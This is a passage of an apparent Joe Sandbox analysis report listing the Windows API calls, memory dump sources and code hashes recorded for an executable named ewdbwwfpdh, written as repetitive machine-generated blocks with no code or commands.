                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c2be786023fb5d195baad1e6e9101eea026c428341c2104bfa9e3fcfec014039
                                                                                                    • Instruction ID: 4179e83ac0c6bfb779b1c3f6a4673f1d3c453901bd1b47670b189b1040f78534
                                                                                                    • Opcode Fuzzy Hash: c2be786023fb5d195baad1e6e9101eea026c428341c2104bfa9e3fcfec014039
                                                                                                    • Instruction Fuzzy Hash: 17014031285625B6E3344A66CC0EF977FA8EF067B4F15C210FE9D6A1E0CBB45855CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsThemeActive.UXTHEME ref: 001732C4
                                                                                                      • Part of subcall function 0017326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00173282
                                                                                                      • Part of subcall function 0017326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00173299
                                                                                                      • Part of subcall function 00173312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001732EF,?), ref: 00173342
                                                                                                      • Part of subcall function 00173312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001732EF,?), ref: 00173355
                                                                                                      • Part of subcall function 00173312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00242418,00242400,?,?,?,?,?,?,001732EF,?), ref: 001733C1
                                                                                                      • Part of subcall function 00173312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00173442
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 001732FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                    • String ID:
                                                                                                    • API String ID: 1550534281-0
                                                                                                    • Opcode ID: f65b37929c440f498b409e8ee27bacebf2538232e207765d2776b5e533645cec
                                                                                                    • Instruction ID: 5299351a2a5a147032978ea87b53ceaca44e33455c96632bc986c453e8ddcb78
                                                                                                    • Opcode Fuzzy Hash: f65b37929c440f498b409e8ee27bacebf2538232e207765d2776b5e533645cec
                                                                                                    • Instruction Fuzzy Hash: 0DF0BE36504344EFE700AFA1FC0EB247FB4BB05705F908805F508951E3CBB98594AB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 0018F97A
                                                                                                      • Part of subcall function 0017EDFE: GetInputState.USER32 ref: 0017EEB7
                                                                                                    • Sleep.KERNEL32(00000000), ref: 001CFAC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InputSleepStateTimetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4149333218-0
                                                                                                    • Opcode ID: 60728f4ed894e1d81b3244d50feaba4dd6efe21ba5097be030f548ec59a44a5d
                                                                                                    • Instruction ID: fc80e82a56b6600493ba959e0e64e57c38047dceafa3d326b10ea522c2296e0f
                                                                                                    • Opcode Fuzzy Hash: 60728f4ed894e1d81b3244d50feaba4dd6efe21ba5097be030f548ec59a44a5d
                                                                                                    • Instruction Fuzzy Hash: 55F08C722446059FD354EBA9D409F5AF7FAFF58364F00842EE85EC7261DB70A800CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 001A506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00239C08,00000010,001994DE), ref: 001A50CC
                                                                                                      • Part of subcall function 001A506A: _free.LIBCMT ref: 001A50DA
                                                                                                      • Part of subcall function 001A510A: _free.LIBCMT ref: 001A512C
                                                                                                    • DeleteCriticalSection.KERNEL32(-00000020), ref: 001994FA
                                                                                                    • _free.LIBCMT ref: 0019950E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$CriticalDeleteSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 1906768660-0
                                                                                                    • Opcode ID: 34036338255704af04558a4d1f129e21e3191b79a0f07c00ee794c803ceb831d
                                                                                                    • Instruction ID: 60a8f6961775b0bdd981bea52823eaf7dd3ac0d63c2c69e5cff208d534142390
                                                                                                    • Opcode Fuzzy Hash: 34036338255704af04558a4d1f129e21e3191b79a0f07c00ee794c803ceb831d
                                                                                                    • Instruction Fuzzy Hash: 79E0DF3A908D108BCB21B7FCFC0AA1933E4FF5B368B09040AF41093021DB217CA28A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0017AE65,?,?,?), ref: 00178793
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0017AE65,?,?,?), ref: 001787C9
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: 7e122aa088bc98eef66364c38167cfca558bf2e616cbcc01fcb89fff104b74f6
• Instruction ID: 194b3fb660f37c4093dbab57fc83401d98be6a53a777cf8bdea5146c426b1972
• Opcode Fuzzy Hash: 7e122aa088bc98eef66364c38167cfca558bf2e616cbcc01fcb89fff104b74f6
• Instruction Fuzzy Hash: 4D0184713412047FEB1D6B699D4BF7F7AADDB89750F14403EB50ADA1D1EE609C009524
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c6d18699e25cb261bfe13596771d21a63db1534b710d3595e158cccf1a2c1c64
• Instruction ID: a6bc976b13b61c692fd30597b34e9e6de19245a07cb7e1bfcd358393eb7c45d5
• Opcode Fuzzy Hash: c6d18699e25cb261bfe13596771d21a63db1534b710d3595e158cccf1a2c1c64
• Instruction Fuzzy Hash: 3FF19F70D082199BCF18EF94C8D0BFEB7B5FF58300F54816AE91AA7290DB349A81CB55
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 124574085c2b9c49eb3f2784ed7f4eecdd05193e3ff7ddb4f2771f220cafad12
• Instruction ID: 994b94202b378d9681fd955b3d64b413dd07c656efae0437cf21122b665b7625
• Opcode Fuzzy Hash: 124574085c2b9c49eb3f2784ed7f4eecdd05193e3ff7ddb4f2771f220cafad12
• Instruction Fuzzy Hash: 3B517075A00208BFDF14DF68C845BA97BB5AB86364F1A816CE858DB391C771ED43CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharLowerBuffW.USER32(?,?), ref: 001DFBE3
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: BuffCharLower
• String ID:
• API String ID: 2358735015-0
• Opcode ID: f791235aa79348709ac0e87a9da423f398d610d030b546dc84f6161d9a6c078f
• Instruction ID: d82f8617fc254ddb9f9af8f2fc9728c016a3e563223e11b9952098933c640070
• Opcode Fuzzy Hash: f791235aa79348709ac0e87a9da423f398d610d030b546dc84f6161d9a6c078f
• Instruction Fuzzy Hash: 8E41E5B2600609AFCB15EFA4C8819AEB7B9EF58310B11853FE9179B251EB70DF41CB50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• TerminateProcess.KERNELBASE ref: 001900AF
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: ProcessTerminate
• String ID:
• API String ID: 560597551-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 90ec16dd810dcb6c7e7687cc546b95f9ab66e97690e9708f89e54f89588fb33c
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 0031D370A00105DFCB1ACF59C480A69F7A6FB59380B6986A5E40ACB356E732EDC1CBD0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 001E8EBE
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: FullNamePathPrivateProfileString
• String ID:
• API String ID: 1991638491-0
• Opcode ID: b438c87335536e6b578808291ba53f44dc9d223d50951225f40bbe754cdfa8fc
• Instruction ID: 842fd27f5bebc010017d92e9bc882615162da5fdc21d4e9671a52f1f866dc581
• Opcode Fuzzy Hash: b438c87335536e6b578808291ba53f44dc9d223d50951225f40bbe754cdfa8fc
• Instruction Fuzzy Hash: 3C211D35600605AFCB11EB64C986CAEBBB5EF59760B048054F9496B3A1CF30FD81CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00176332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017633E
  • Part of subcall function 00176332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00176350
  • Part of subcall function 00176332: FreeLibrary.KERNEL32(00000000,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176362
• LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017639F
  • Part of subcall function 001762FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176304
  • Part of subcall function 001762FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00176316
  • Part of subcall function 001762FB: FreeLibrary.KERNEL32(00000000,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176329
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: 9973da6ddbd70ac19722293bcef6cf1db9a93c80ca4ba2f5cea75cc702eaf388
• Instruction ID: 5e72abb8ba028191e52acc0821d145b4e9ffc1596a524eb63147f25ccb54450a
• Opcode Fuzzy Hash: 9973da6ddbd70ac19722293bcef6cf1db9a93c80ca4ba2f5cea75cc702eaf388
• Instruction Fuzzy Hash: 7511E332640A05AACB14FB64C806BAD77B5AF70715F20C42EF48BA61C2EFB49A85D750
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 7d5760ef34c7b2034f4e84f10ebf36c6aedf33814ff474da9ec42efde0bacbce
• Instruction ID: ce4465b4689a4ab41c16d009dbef6650cdadfce129eb2efdc1f3a32e7b2f358c
• Opcode Fuzzy Hash: 7d5760ef34c7b2034f4e84f10ebf36c6aedf33814ff474da9ec42efde0bacbce
• Instruction Fuzzy Hash: 4011487590420AAFCB06DF98E94499E7BF5EF49310F104069F809AB311DB30EA218BA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00176B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0017B0AC
Memory Dump Source
• Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 501cb219a870b174dfd789e1800a59272a7d0b249213122d2b395690c2ed4b3f
• Instruction ID: 9adce7a5ab9a6c3eabb6223190075d0ade0be1b26ea9416af5c9aa3ff33e03d0
• Opcode Fuzzy Hash: 501cb219a870b174dfd789e1800a59272a7d0b249213122d2b395690c2ed4b3f
• Instruction Fuzzy Hash: 68113631208705DFD7208E15C880B67B7F9EF44364F10C42EE9AA8BA51C7B1A945CB60
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 001A500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 001A504E
                                                                                                    • _free.LIBCMT ref: 001A53FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                    • Instruction ID: 21a075da676e206e793da3b29b57523078489a6a0375d81cc371fc152fbac900
                                                                                                    • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                    • Instruction Fuzzy Hash: 630126B62087056BE7218E699845A5AFBD9FFCA370F25061DE1D497280EB70A805CA74
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                    • Instruction ID: 2ba1aeb7000eb1d69baf77dd0b6b7beb5e8be827a8f858662ab55fec4989b062
                                                                                                    • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                    • Instruction Fuzzy Hash: 65F0A4365016205ADF256A7ADC05B6A36D89F63338F150B19F865921D1DF74E80286A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 001A504E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 63764ec46d9072077bb2310c3d7b93540037b1d0e61723773494fb04645fb444
                                                                                                    • Instruction ID: 97e7acd5c1d7cdc74326ee6787fc89d635bac0a95434fedfbf562ca4c3c2f435
                                                                                                    • Opcode Fuzzy Hash: 63764ec46d9072077bb2310c3d7b93540037b1d0e61723773494fb04645fb444
                                                                                                    • Instruction Fuzzy Hash: A0F0E939609E24A7DF311F729D05B5A3B5BBF637B1B158015FC04E6192CB70D80086E0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00196A99,?,0000015D,?,?,?,?,001985D0,000000FF,00000000,?,?), ref: 001A3BE2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: ce4f1028f028ecd79e257374531e57818d656f19cb5906ae3eaaa015e3b733f0
                                                                                                    • Instruction ID: 4b3856a45538ec981fab3428ab11e94ac249fb9b20d0a5c4f57ac334c2638b3e
                                                                                                    • Opcode Fuzzy Hash: ce4f1028f028ecd79e257374531e57818d656f19cb5906ae3eaaa015e3b733f0
                                                                                                    • Instruction Fuzzy Hash: 17E0E53920421097DB212B669C04F5A365BEB037E0F250121FC25E2091DB31DE0082F1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 30853b41bf27274c25117a808a4f8a590950231f10d58a601d6d801f9308a2f4
                                                                                                    • Instruction ID: 5bf4296148bd873fa4e7b38abfbb167d32f359e4d91a8d8af8312863f849211f
                                                                                                    • Opcode Fuzzy Hash: 30853b41bf27274c25117a808a4f8a590950231f10d58a601d6d801f9308a2f4
                                                                                                    • Instruction Fuzzy Hash: 9DF01571101B12CFCB399F64D894852BBF5BF1432A324897EE1DB82620C731A840DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
